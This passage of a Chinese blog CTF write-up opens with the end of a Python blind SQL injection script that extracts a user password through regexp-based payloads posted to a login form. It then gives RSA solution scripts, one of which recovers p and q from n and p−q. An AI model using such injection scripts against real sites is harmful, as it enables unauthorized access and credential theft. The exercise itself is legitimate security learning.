str=<span class="string">'5c'</span>+hex(j)[<span class="number">2</span>:]  <span class="comment">#将'&#123;'转义，</span></span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line">            str=hex(j)[<span class="number">2</span>:]</span><br><span class="line"></span><br><span class="line">        time.sleep(<span class="number">0.1</span>)</span><br><span class="line"></span><br><span class="line">        payload  =<span class="string">"||/**/(select/**/password/**/from/**/users/**/limit/**/9,1)/**/regexp/**/binary/**/%s/**/#"</span> % (a + str)</span><br><span class="line"><span class="comment"># 盲注的查询语句 regexp binary 是区分大小写的正则匹配</span></span><br><span class="line">        data =&#123;<span class="string">"username"</span>:<span class="string">"\\"</span>,<span class="string">"password"</span>:payload&#125;</span><br><span class="line">        print(data)</span><br><span class="line">        r = requests.post(url,data=data) <span class="comment">#访问</span></span><br><span class="line">        <span class="keyword">if</span> <span class="string">"success"</span> <span class="keyword">in</span> r.text:</span><br><span class="line">            <span class="comment">#print(r.text)</span></span><br><span class="line">            password+=chr(j)</span><br><span class="line">            print(password)</span><br><span class="line">            a+=str      		</span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line">    <span class="keyword">if</span> <span class="string">"wrong"</span> <span class="keyword">in</span> r.text:</span><br><span class="line">        <span class="keyword">break</span></span><br><span class="line">print(password)</span><br></pre></td></tr></table></figure>

<h2 id="Crypto"><a href="#Crypto" class="headerlink" title="Crypto"></a>Crypto</h2><h3 id="幼儿园的密码题"><a href="#幼儿园的密码题" class="headerlink" title="幼儿园的密码题"></a>幼儿园的密码题</h3><p>先转换为十进制后在线分解后直接上脚本</p>
<p><a href="http://www.factordb.com/" target="_blank" rel="noopener">http://www.factordb.com/</a> 在线分解网址</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> binascii</span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line">sys.setrecursionlimit(<span class="number">1000000</span>)</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">ByteToHex</span><span class="params">(bins)</span>:</span></span><br><span class="line">  <span class="keyword">return</span> <span class="string">''</span>.join([<span class="string">"%02X"</span> % x <span class="keyword">for</span> x <span class="keyword">in</span> bins]).strip()</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">n2s</span><span class="params">(num)</span>:</span></span><br><span class="line">  t = hex(num)[<span class="number">2</span>:<span class="number">-1</span>]  <span class="comment"># python</span></span><br><span class="line">  <span class="keyword">if</span> len(t) % <span class="number">2</span> == <span class="number">1</span>:</span><br><span class="line">    t = <span class="string">'0'</span> + t</span><br><span class="line">  \<span class="comment">#print(t)</span></span><br><span class="line">  <span class="keyword">return</span>(binascii.a2b_hex(t).decode(<span class="string">'latin1'</span>))</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">egcd</span><span class="params">(a, b)</span>:</span></span><br><span class="line">  <span class="keyword">if</span> a == <span class="number">0</span>:</span><br><span class="line">    <span class="keyword">return</span> (b, <span class="number">0</span>, <span class="number">1</span>)</span><br><span class="line">  <span class="keyword">else</span>:</span><br><span class="line">    g, y, x = egcd(b % a, a)</span><br><span class="line">    <span class="keyword">return</span> (g, x - (b // a) * y, y)</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">modinv</span><span class="params">(a, m)</span>:</span></span><br><span class="line">  g, x, y = egcd(a, m)</span><br><span class="line">  <span class="keyword">if</span> g != <span class="number">1</span>:</span><br><span class="line">    print(<span class="string">'modular inverse does not exist'</span>)</span><br><span class="line">    <span class="keyword">return</span> <span class="string">'null'</span></span><br><span class="line">  <span class="keyword">else</span>:</span><br><span class="line">    <span class="keyword">return</span> x % m</span><br><span class="line">c = <span class="number">40448992051548719008529549070468060415257485938698092782029814901918646701101</span></span><br><span class="line">p = <span class="number">328413456989577256301798468872388310877</span></span><br><span class="line">q = <span class="number">324350545929838254331191385863847627003</span></span><br><span class="line">e = <span class="number">65537</span></span><br><span class="line">n = p * q</span><br><span class="line">d = modinv(e, (p - <span class="number">1</span>) * (q - <span class="number">1</span>))</span><br><span class="line">m = pow(c, d, n)</span><br><span class="line"></span><br><span class="line"><span class="keyword">print</span> (m)</span><br></pre></td></tr></table></figure>



<p>数字转字符的脚本</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> binascii</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">n2s</span><span class="params">(num)</span>:</span></span><br><span class="line">  t = hex(num)[<span class="number">2</span>:<span class="number">-1</span>]  <span class="comment"># python</span></span><br><span class="line">  <span class="keyword">if</span> len(t) % <span class="number">2</span> == <span class="number">1</span>:</span><br><span class="line">    t = <span class="string">'0'</span> + t</span><br><span class="line">  \<span class="comment">#print(t)</span></span><br><span class="line">  <span class="keyword">return</span>(binascii.a2b_hex(t).decode(<span class="string">'latin1'</span>))</span><br><span class="line">print(n2s(a)) <span class="comment">#a为上一个脚本计算出的数字</span></span><br></pre></td></tr></table></figure>



<h3 id="小学生的密码题"><a href="#小学生的密码题" class="headerlink" title="小学生的密码题"></a>小学生的密码题</h3><h3 id="初中生的密码题"><a href="#初中生的密码题" class="headerlink" title="初中生的密码题"></a>初中生的密码题</h3><p>次题与幼儿园的类似，但是由于n过大，试了很多工具都无法分解。</p>
<p>仔细看题会发现这题的条件给的比较多,知道p-q</p>
<p>于是想到了<code>(p+q)^2-(p-q)^2=4pq=4n</code>，可以算出p+q,之后解出p,q</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">算p,q的脚本</span><br><span class="line"><span class="comment"># -*- coding = utf - 8 -*-</span></span><br><span class="line"><span class="comment">#@Time : 2020/9/24 21:55</span></span><br><span class="line"><span class="comment">#@Author : sunzy</span></span><br><span class="line"><span class="comment">#@File : su.py</span></span><br><span class="line"><span class="keyword">import</span> gmpy2</span><br><span class="line">n = <span class="number">848636981711330203910533960833570455347986345690792054016750216327432282027653737545502731789145875082064910377585125307004316982829408169391535303284775605083341204318559328114199464933306718077358184455649201353500348066849356092072732731595459583112558025395897556853371526959018489282157258240657926428930442774978485014507505784476690845099227369478496626645851076679385883251594929952035661085961598388544126711902983065521128172978259778754970695037278639045266353840536697343675638366506183715240679610094431082173271579344392346412454309134164388560354168918421706979410826758333952277436780339926907679282601846125790204266958409253210507301575619878252146515542791259716201124558373197816421305046774535734189567481599690381428371580696486054135486182509762880877363356256116336930055483318415453999460475103494980748558993889459677374574910745242385711928489669790527969454801533682757508950065697410745338257289717598141031203566419840587221470340637486034911686587695890702753064441476917845870069997649577034149354150224132983093069444866234262542625997399303875938451386377357399819123134018307163799151847997740448433278364764592560369020005024859119937315831252233159882960532854116233641920659786799836075681746397</span></span><br><span class="line">p_sub_q = <span class="number">-3052070064538177039316204197190587772604720575847063904632214287646067455053231054471310322671549035272267675314294983896730810628462303176753740499536650509067032550999649642312183001467325569057721784454105443122299599368088210370664912463545058026638059476152117310712548608873763578306375998350729040793659145108802752313856984121444358377361896069243965149432626400631035486457915394853541729904150184876824863707417199152978276518660302136096681722191666079256269268999389217644896376343059852127338281844120448782198891495913902938174313438531667749920307775936355947018946620720978288405012504885451732231636</span></span><br><span class="line">x = (<span class="number">4</span>*n+p_sub_q*p_sub_q)</span><br><span class="line"></span><br><span class="line">gmpy2.mpz(x)</span><br><span class="line"><span class="comment">#p_add_q = gmpy2.iroot(x, 2)</span></span><br><span class="line">p_add_q = <span class="number">58342634998122692674032973234620896020471694068399847453520741898744437026570834277134765347908181270295928479896424327076716339778780713227054670754114006755614107059128760453507315091935855120450792252194791430498450216725579392051311373554303029775579999984765816108626868293630358812164765119470747267373609041885833415440716244492402495944064255436477147868576748300862501670473856373437423326957856588782039066794320093570665076624361151742737113922376038763268964187459938086360191752544167623804772397201519904950840301831333585995087985697059748872751988663760065650743406672809203915981347563824970092886078</span></span><br><span class="line"><span class="comment"># print(p_add_q)</span></span><br><span class="line">y=(p_sub_q+p_add_q)</span><br><span class="line">z=(p_add_q-p_sub_q)</span><br><span class="line"></span><br><span class="line">print(y&gt;&gt;<span class="number">1</span>)</span><br><span class="line">print(z&gt;&gt;<span class="number">1</span>)</span><br></pre></td></tr></table></figure>

<p>知道p,q后，此题的解法与幼儿园的解法相同</p>
<p>菜鸡只会这么多。。。</p>

    </div>
    <div>
      
        <div>
    
        <div style="text-align:center;color: #ccc;font-size:14px;">-------------本文结束<i class="fa fa-paw"></i>感谢您的阅读-------------</div>
    
</div>

      
    </div>


    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/sql/" rel="tag"># sql</a>
              <a href="/tags/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/" rel="tag"># 文件包含</a>
              <a href="/tags/rsa/" rel="tag"># rsa</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2020/09/27/fakebook/" rel="prev" title="fakebook">
      <i class="fa fa-chevron-left"></i> fakebook
    </a></div>
      <div class="post-nav-item">
    <a href="/2020/09/27/homework/" rel="next" title="网安作业">
      网安作业 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          
    <div class="comments" id="valine-comments"></div>

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#CUMTCTF-wp"><span class="nav-number">1.</span> <span class="nav-text">CUMTCTF-wp</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#Web"><span class="nav-number">1.1.</span> <span class="nav-text">Web</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#签到"><span class="nav-number">1.1.1.</span> <span class="nav-text">签到</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#babysql"><span class="nav-number">1.1.2.</span> <span class="nav-text">babysql</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#secret"><span class="nav-number">1.1.3.</span> <span class="nav-text">secret</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#babysql2"><span class="nav-number">1.1.4.</span> <span class="nav-text">babysql2</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Crypto"><span class="nav-number">1.2.</span> <span class="nav-text">Crypto</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#幼儿园的密码题"><span class="nav-number">1.2.1.</span> <span class="nav-text">幼儿园的密码题</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#小学生的密码题"><span class="nav-number">1.2.2.</span> <span class="nav-text">小学生的密码题</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#初中生的密码题"><span class="nav-number">1.2.3.</span> <span class="nav-text">初中生的密码题</span></a></li></ol></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="sunzy"
      src="/images/my.png">
  <p class="site-author-name" itemprop="name">sunzy</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">26</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">10</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">38</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/sunzhengyu99" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;sunzhengyu99" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="mailto:2632338423@qq.com" title="E-Mail → mailto:2632338423@qq.com" rel="noopener" target="_blank"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        


<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">sunzy</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-area"></i>
    </span>
      <span class="post-meta-item-text">站点总字数：</span>
    <span title="站点总字数">69k</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>








      </div>
    </footer>
  </div>

  
  <script size="300" alpha="0.6" zIndex="-1" src="/lib/canvas-ribbon/canvas-ribbon.js"></script>
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>











<script>
if (document.querySelectorAll('pre.mermaid').length) {
  NexT.utils.getScript('//cdn.jsdelivr.net/npm/mermaid@8/dist/mermaid.min.js', () => {
    mermaid.initialize({
      theme    : 'forest',
      logLevel : 3,
      flowchart: { curve     : 'linear' },
      gantt    : { axisFormat: '%m/%d/%Y' },
      sequence : { actorMargin: 50 }
    });
  }, window.mermaid);
}
</script>


  

  


<script>
NexT.utils.loadComments(document.querySelector('#valine-comments'), () => {
  NexT.utils.getScript('//unpkg.com/valine/dist/Valine.min.js', () => {
    var GUEST = ['nick', 'mail', 'link'];
    var guest = 'nick,mail,link';
    guest = guest.split(',').filter(item => {
      return GUEST.includes(item);
    });
    new Valine({
      el         : '#valine-comments',
      verify     : false,
      notify     : true,
      appId      : '2rPljbm5WOxA9BCPXqy3VE5y-gzGzoHsz',
      appKey     : 'SCoIn2Qp99a7ITtPhkAi6Chw',
      placeholder: "Just go go",
      avatar     : 'mm',
      meta       : guest,
      pageSize   : '10' || 10,
      visitor    : false,
      lang       : '' || 'zh-cn',
      path       : location.pathname,
      recordIP   : false,
      serverURLs : ''
    });
  }, window.Valine);
});
</script>

<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"model":{"jsonPath":"/live2dw/assets/wanko.model.json"},"display":{"position":"right","width":150,"height":300},"mobile":{"show":false},"log":false});</script></body>
</html>

<!-- 页面点击小红心 -->
<script type="text/javascript" src="/js/clicklove.js"></script>

